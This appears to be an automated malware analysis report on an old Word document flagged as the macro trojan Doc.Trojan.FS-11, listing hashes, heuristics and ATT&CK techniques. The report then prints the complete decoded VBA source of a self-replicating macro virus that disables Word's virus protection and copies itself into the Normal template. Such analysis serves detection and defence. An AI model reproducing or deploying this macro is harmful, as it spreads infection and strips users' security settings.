Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 310f466bb1287e83…

MALICIOUS

Office (OLE)

26.0 KB Created: 1999-08-14 16:52:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 45356429eba429569b775f8f7ef3ec2f SHA-1: 89851f5d5c072edf6cac3c1d089f9d33891b0d34 SHA-256: 310f466bb1287e8329a51e79d63c73c500d0d00b143577ea9fddfaf53dd90fcf
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing embedded VBA macros, specifically a Document_Open macro. This macro is designed to copy its own code into the Normal template, likely to establish persistence or ensure execution on subsequent document openings. The presence of the Document_Open macro and the VBA code strongly suggests a malicious intent to execute arbitrary code.

Heuristics 3

  • ClamAV: Doc.Trojan.FS-11 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.FS-11
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1022 bytes
SHA-256: 189378d559cf79f2e7ad75d75e98c113f22e139f1c48e9015a2ea46eb0daff62
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Copyright (C) 1998 by FlyShadow ~^^~ - Anoia
Private Sub Document_Open()
On Error Resume Next
ι = ActiveDocument.Saved
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0
Application.DisplayAlerts = 0
Options.ConfirmConversions = 0
Application.EnableCancelKey = 0
Application.DisplayStatusBar = 0
Set α = ActiveDocument.VBProject.VBComponents(1).CodeModule
Set υ = NormalTemplate.VBProject.VBComponents(1).CodeModule
Set ν = VBProject.VBComponents(1).CodeModule
If α.CountOfLines < ν.CountOfLines Then
α.AddFromString ν.Lines(1, ν.CountOfLines)
If ActiveDocument.ReadOnly = False Then ActiveDocument.Save
ElseIf υ.CountOfLines < ν.CountOfLines Then
υ.AddFromString ν.Lines(1, ν.CountOfLines)
End If: ActiveDocument.Saved = ι
End Sub